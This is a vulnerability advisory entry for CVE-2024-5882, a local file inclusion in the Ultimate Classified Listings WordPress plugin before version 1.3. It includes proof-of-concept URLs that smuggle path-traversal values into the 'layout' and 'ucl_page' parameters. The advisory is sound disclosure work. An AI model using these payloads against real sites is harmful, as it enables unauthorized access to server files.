Ultimate Classified Listings < 1.3 – Unauthenticated LFI | CVE 2024-5882 | Plugin Vulnerabilities

Description

The plugin does not validate the `ucl_page` and `layout` parameters allowing unauthenticated users to access PHP files on the server from the listings page

Proof of Concept

As an unauthenticated user:

1. On a post with the `[uclwp_listings]` shortcode  you can manipulate the `layout` parameter to include the PHP file Ex: https://example.com/2024/06/11/uclwp-dashboard/?ucl_page=listings&layout=../../../../../../index

As an admin:

1. Access a post containing the `[uclwp_dashboard]` shortcode.
2. Ex: https://example.com/2024/06/11/uclwp-dashboard/?ucl_page=../../../../../../index

Affects Plugins

ultimate-classified-listings

Fixed in 1.3

References

CVE

URL

https://projectblack.io/blog/cve-hunting-at-scale/

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Project Black

Submitter

Project Black

Submitter website

https://projectblack.io/penetration-testing/

Submitter twitter

Verified

Yes

WPVDB ID

5e8d7808-8f3e-4fc9-a1e7-e108da031ca7

Timeline

Publicly Published

2024-07-08 (about 1 year ago)

Added

2024-07-08 (about 1 year ago)

Last Updated

2024-07-08 (about 1 year ago)

Other

Published

Title

Published

2025-09-30

Title

Taskbot < 6.5 - Authenticated (Subscriber+) Arbitrary File Deletion

Published

2023-09-22

Title

Migration, Backup, Staging – WPvivid < 0.9.90 - Admin+ Arbitrary Directory Deletion via Path Traversal

Published

2016-11-30

Title

WP Vault 0.8.6.6 - Unauthenticated Local File Inclusion (LFI)

Published

2025-01-16

Title

WP Cloud <= 1.4.3 - Unauthenticated Arbitrary File Read

Published

2024-11-11

Title

DigiPass <= 0.3.0 - Unauthenticated Arbitrary File Download